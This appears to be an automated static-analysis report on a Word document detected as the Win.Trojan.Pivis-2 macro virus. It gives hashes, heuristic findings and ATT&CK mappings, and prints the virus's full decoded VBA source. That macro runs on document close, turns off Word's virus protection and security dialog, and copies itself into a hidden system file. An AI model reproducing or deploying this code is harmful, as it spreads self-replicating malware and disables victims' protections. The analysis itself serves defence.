Win.Trojan.Pivis-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 68ce329c7ad7c615…

MALICIOUS

Office (OLE)

31.5 KB Created: 2004-02-09 18:42:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: 33d8f3a8695c1bce3f4bdb4165708110 SHA-1: 7b39d09b785c059ebb06df793ecb6b7f90f87c5f SHA-256: 68ce329c7ad7c6151497b79f624064c32e8513fc44ee3f8adde0de27ab3b6a43
180 Risk Score

Malware Insights

Win.Trojan.Pivis-2 · confidence 90%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is identified as Win.Trojan.Pivis-2 by ClamAV. It contains an Auto_Close VBA macro that executes upon document closure. This macro attempts to export itself to 'C:\Windows\ntvck.drv' and potentially re-import it, suggesting an attempt to establish persistence or facilitate further malicious activity. The macro also manipulates Word security settings, including disabling virus protection and setting the security level to 1.

Heuristics 5

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3150 bytes
SHA-256: 2f3ee16a4fb410b977a0b90b7bcfd52f4a805f39b5d04633aa2a8a03c680355f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ntvck"

Sub ntvck()

    ' NTVCK
    ' ==================================
    ' Code by Necronomikon[ZeroGravity]
    ' ==================================
    ' W2KM.ntvck
    ' ==================================

'VirusName: ntvck
'Author Name: nec
'Date and Time:09.02.04 19:39:38
On Error Resume Next
ActiveDocument.ReadOnlyRecommended = False
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayStatusBar = False
Options.ConfirmConversions = False
Options.VirusProtection = False
CommandBars(" Macro ").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Options.SaveNormalPrompt = False
If NormalTemplate.VBProject.VBComponents.Item("ntvck").Name <> "ntvck" Then
ActiveDocument.VBProject.VBComponents("ntvck").Export ("C:\Windows\ntvck.drv")
SetAttr "C:\Windows\ntvck.drv", 6
End If
If ActiveDocument.VBProject.VBComponents.Item("ntvck").Name <> "ntvck" Then
ActiveDocument.VBProject.VBComponents.import ("C:\Windows\ntvck .drv ")
ActiveDocument.Save
 End If
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(78) + Chr(101) + Chr(99) + Chr(114) + Chr(111) + Chr(110) + Chr(111) + Chr(109) + Chr(105) + Chr(107) + Chr(111) + Chr(110)
.Comments = Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(32) + Chr(86) + Chr(105) + Chr(114) + Chr(117) + Chr(115) + Chr(32) + Chr(119) + Chr(97) + Chr(115) + Chr(32) + Chr(99) + Chr(114) + Chr(101) + Chr(97) + Chr(116) + Chr(101) + Chr(100) + Chr(32) + Chr(119) + Chr(105) + Chr(116) + Chr(104) + Chr(32) + Chr(78) + Chr(84) + Chr(86) + Chr(67) + Chr(75) + Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(78) + Chr(101) + Chr(99) + Chr(114) + Chr(111) + Chr(110) + Chr(111) + Chr(109) + Chr(105) + Chr(107) + Chr(111) + Chr(110)
.Keywords = Chr(32) + Chr(82) + Chr(101) + Chr(97) + Chr(100) + Chr(121) + Chr(32) + Chr(82) + Chr(97) + Chr(110) + Chr(103) + Chr(101) + Chr(114) + Chr(115) + Chr(32) + Chr(76) + Chr(105) + Chr(98) + Chr(101) + Chr(114) + Chr(97) + Chr(116) + Chr(105) + Chr(111) + Chr(110) + Chr(32) + Chr(70) + Chr(114) + Chr(111) + Chr(110) + Chr(116)
.Execute
End With

If Day(Now()) = 31 Then Msgbox Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(32) + Chr(86) + Chr(105) + Chr(114) + Chr(117) + Chr(115) + Chr(32) + Chr(119) + Chr(97) + Chr(115) + Chr(32) + Chr(99) + Chr(114) + Chr(101) + Chr(97) + Chr(116) + Chr(101) + Chr(100) + Chr(32) + Chr(119) + Chr(105) + Chr(116) + Chr(104) + Chr(32) + Chr(78) + Chr(84) + Chr(86) + Chr(67) + Chr(75) + Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(78) + Chr(101) + Chr(99) + Chr(114) + Chr(111) + Chr(110) + Chr(111) + Chr(109) + Chr(105) + Chr(107) + Chr(111) + Chr(110)
End Sub
Sub AutoClose()
    On Error Resume Next
Call ntvck
End Sub